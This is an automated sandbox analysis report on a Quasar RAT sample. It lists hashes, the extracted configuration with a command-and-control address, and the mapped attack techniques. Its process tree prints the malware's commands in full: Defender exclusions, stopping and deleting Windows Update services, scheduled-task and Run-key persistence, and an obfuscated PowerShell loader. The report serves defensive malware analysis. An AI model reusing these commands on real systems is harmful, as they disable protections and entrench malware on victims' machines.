quasar | 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba

Analysis

max time kernel
17s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2025 03:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
Size

6.0MB
MD5

13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1

762c7072179bce1822999dc30c6252262caf6c00
SHA256

210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
SHA512

b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
SSDEEP

98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ

Score

10^/10

quasar 4drun evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b9e-22.dat	family_quasar
behavioral2/memory/2396-31-0x0000000000890000-0x0000000000914000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4852	powershell.exe
2212	powershell.exe
4700	powershell.exe
2164	powershell.exe
3772	powershell.exe
3568	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe

Executes dropped EXE 5 IoCs

pid	Process
816	gfiKDLgr58thy4d.exe
3396	GR55Qg1hth.exe
2396	F4R5fd8grr.exe
2388	Client.exe
4040	kaptsegthwf.exe

Power Settings 1 TTPs 17 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1284	powercfg.exe
924	powercfg.exe
1224	powercfg.exe
4556	powercfg.exe
828	powercfg.exe
2828	powercfg.exe
4640	powercfg.exe
4528	powercfg.exe
3528	powercfg.exe
3532	powercfg.exe
3624	powercfg.exe
2856	cmd.exe
4948	powercfg.exe
2076	powercfg.exe
5096	cmd.exe
3232	powercfg.exe
3600	powercfg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\dialersvc32	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	gfiKDLgr58thy4d.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 816 set thread context of 2308	816	gfiKDLgr58thy4d.exe	130
PID 3396 set thread context of 1828	3396	GR55Qg1hth.exe	155

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	GR55Qg1hth.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1828	sc.exe
4072	sc.exe
3820	sc.exe
4484	sc.exe
5032	sc.exe
4516	sc.exe
3256	sc.exe
2524	sc.exe
1832	sc.exe
4980	sc.exe
3296	sc.exe
3900	sc.exe
3472	sc.exe
2044	sc.exe
1040	sc.exe
1600	sc.exe
4636	sc.exe
3204	sc.exe
4504	sc.exe
2140	sc.exe
2668	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3532	schtasks.exe
1736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
816	gfiKDLgr58thy4d.exe
4852	powershell.exe
4852	powershell.exe
2212	powershell.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
2212	powershell.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
3772	powershell.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
2308	dialer.exe
2308	dialer.exe
3772	powershell.exe
3772	powershell.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
816	gfiKDLgr58thy4d.exe
4040	kaptsegthwf.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
2308	dialer.exe
2308	dialer.exe
2308	dialer.exe
2308	dialer.exe
2308	dialer.exe
2308	dialer.exe
4292	powershell.exe
4292	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2396	F4R5fd8grr.exe
Token: SeDebugPrivilege	2388	Client.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	4948	powercfg.exe
Token: SeCreatePagefilePrivilege	4948	powercfg.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeShutdownPrivilege	1224	powercfg.exe
Token: SeCreatePagefilePrivilege	1224	powercfg.exe
Token: SeDebugPrivilege	816	gfiKDLgr58thy4d.exe
Token: SeDebugPrivilege	2308	dialer.exe
Token: SeShutdownPrivilege	4528	powercfg.exe
Token: SeCreatePagefilePrivilege	4528	powercfg.exe
Token: SeShutdownPrivilege	828	powercfg.exe
Token: SeCreatePagefilePrivilege	828	powercfg.exe
Token: SeShutdownPrivilege	2828	powercfg.exe
Token: SeCreatePagefilePrivilege	2828	powercfg.exe
Token: SeShutdownPrivilege	3528	powercfg.exe
Token: SeCreatePagefilePrivilege	3528	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	3532	powercfg.exe
Token: SeCreatePagefilePrivilege	3532	powercfg.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeIncreaseQuotaPrivilege	3772	powershell.exe
Token: SeSecurityPrivilege	3772	powershell.exe
Token: SeTakeOwnershipPrivilege	3772	powershell.exe
Token: SeLoadDriverPrivilege	3772	powershell.exe
Token: SeSystemProfilePrivilege	3772	powershell.exe
Token: SeSystemtimePrivilege	3772	powershell.exe
Token: SeProfSingleProcessPrivilege	3772	powershell.exe
Token: SeIncBasePriorityPrivilege	3772	powershell.exe
Token: SeCreatePagefilePrivilege	3772	powershell.exe
Token: SeBackupPrivilege	3772	powershell.exe
Token: SeRestorePrivilege	3772	powershell.exe
Token: SeShutdownPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeSystemEnvironmentPrivilege	3772	powershell.exe
Token: SeRemoteShutdownPrivilege	3772	powershell.exe
Token: SeUndockPrivilege	3772	powershell.exe
Token: SeManageVolumePrivilege	3772	powershell.exe
Token: 33	3772	powershell.exe
Token: 34	3772	powershell.exe
Token: 35	3772	powershell.exe
Token: 36	3772	powershell.exe
Token: SeIncreaseQuotaPrivilege	3772	powershell.exe
Token: SeSecurityPrivilege	3772	powershell.exe
Token: SeTakeOwnershipPrivilege	3772	powershell.exe
Token: SeLoadDriverPrivilege	3772	powershell.exe
Token: SeSystemProfilePrivilege	3772	powershell.exe
Token: SeSystemtimePrivilege	3772	powershell.exe
Token: SeProfSingleProcessPrivilege	3772	powershell.exe
Token: SeIncBasePriorityPrivilege	3772	powershell.exe
Token: SeCreatePagefilePrivilege	3772	powershell.exe
Token: SeBackupPrivilege	3772	powershell.exe
Token: SeRestorePrivilege	3772	powershell.exe
Token: SeShutdownPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeSystemEnvironmentPrivilege	3772	powershell.exe
Token: SeRemoteShutdownPrivilege	3772	powershell.exe
Token: SeUndockPrivilege	3772	powershell.exe
Token: SeManageVolumePrivilege	3772	powershell.exe
Token: 33	3772	powershell.exe
Token: 34	3772	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3396	GR55Qg1hth.exe
2388	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 816	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	82
PID 2164 wrote to memory of 816	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	82
PID 2164 wrote to memory of 3396	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	84
PID 2164 wrote to memory of 3396	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	84
PID 2164 wrote to memory of 2396	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	85
PID 2164 wrote to memory of 2396	2164	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	85
PID 2396 wrote to memory of 3532	2396	F4R5fd8grr.exe	86
PID 2396 wrote to memory of 3532	2396	F4R5fd8grr.exe	86
PID 2396 wrote to memory of 2388	2396	F4R5fd8grr.exe	88
PID 2396 wrote to memory of 2388	2396	F4R5fd8grr.exe	88
PID 2388 wrote to memory of 1736	2388	Client.exe	89
PID 2388 wrote to memory of 1736	2388	Client.exe	89
PID 3396 wrote to memory of 2212	3396	GR55Qg1hth.exe	100
PID 3396 wrote to memory of 2212	3396	GR55Qg1hth.exe	100
PID 3260 wrote to memory of 4764	3260	cmd.exe	106
PID 3260 wrote to memory of 4764	3260	cmd.exe	106
PID 3396 wrote to memory of 4248	3396	GR55Qg1hth.exe	111
PID 3396 wrote to memory of 4248	3396	GR55Qg1hth.exe	111
PID 3396 wrote to memory of 2856	3396	GR55Qg1hth.exe	112
PID 3396 wrote to memory of 2856	3396	GR55Qg1hth.exe	112
PID 3396 wrote to memory of 3772	3396	GR55Qg1hth.exe	113
PID 3396 wrote to memory of 3772	3396	GR55Qg1hth.exe	113
PID 2856 wrote to memory of 4948	2856	cmd.exe	119
PID 2856 wrote to memory of 4948	2856	cmd.exe	119
PID 4248 wrote to memory of 1828	4248	cmd.exe	155
PID 4248 wrote to memory of 1828	4248	cmd.exe	155
PID 2856 wrote to memory of 1224	2856	cmd.exe	123
PID 2856 wrote to memory of 1224	2856	cmd.exe	123
PID 4248 wrote to memory of 2524	4248	cmd.exe	124
PID 4248 wrote to memory of 2524	4248	cmd.exe	124
PID 2856 wrote to memory of 4528	2856	cmd.exe	125
PID 2856 wrote to memory of 4528	2856	cmd.exe	125
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 816 wrote to memory of 2308	816	gfiKDLgr58thy4d.exe	130
PID 4248 wrote to memory of 3472	4248	cmd.exe	188
PID 4248 wrote to memory of 3472	4248	cmd.exe	188
PID 2856 wrote to memory of 3532	2856	cmd.exe	140
PID 2856 wrote to memory of 3532	2856	cmd.exe	140
PID 4248 wrote to memory of 3820	4248	cmd.exe	141
PID 4248 wrote to memory of 3820	4248	cmd.exe	141
PID 4248 wrote to memory of 1040	4248	cmd.exe	146
PID 4248 wrote to memory of 1040	4248	cmd.exe	146
PID 4248 wrote to memory of 2716	4248	cmd.exe	166
PID 4248 wrote to memory of 2716	4248	cmd.exe	166
PID 4248 wrote to memory of 4796	4248	cmd.exe	151
PID 4248 wrote to memory of 4796	4248	cmd.exe	151
PID 4248 wrote to memory of 1588	4248	cmd.exe	152
PID 4248 wrote to memory of 1588	4248	cmd.exe	152
PID 4248 wrote to memory of 3652	4248	cmd.exe	153
PID 4248 wrote to memory of 3652	4248	cmd.exe	153
PID 4248 wrote to memory of 4776	4248	cmd.exe	154
PID 4248 wrote to memory of 4776	4248	cmd.exe	154
PID 2308 wrote to memory of 612	2308	dialer.exe	5
PID 2308 wrote to memory of 668	2308	dialer.exe	7
PID 2308 wrote to memory of 944	2308	dialer.exe	12
PID 2308 wrote to memory of 1020	2308	dialer.exe	13
PID 2308 wrote to memory of 732	2308	dialer.exe	14
PID 2308 wrote to memory of 912	2308	dialer.exe	15
PID 2308 wrote to memory of 1092	2308	dialer.exe	17

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{11a9dcb5-7fa3-4e48-85f4-537ad92ccf26}
  2⤵
  PID:2352
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{e7b110aa-c224-4439-97bc-b2749027ae6e}
  2⤵
  PID:2912

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1192
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2784
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:2424
- C:\Program Files\Cuis\bon\Bara.exe
  "C:\Program Files\Cuis\bon\Bara.exe"
  2⤵
  PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2164
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4192
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3296
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1600
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5096
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:3624
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3600
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:4640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3568
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe ujznpffbjbh
    3⤵
    PID:828
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    PID:4524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1408
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2012

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
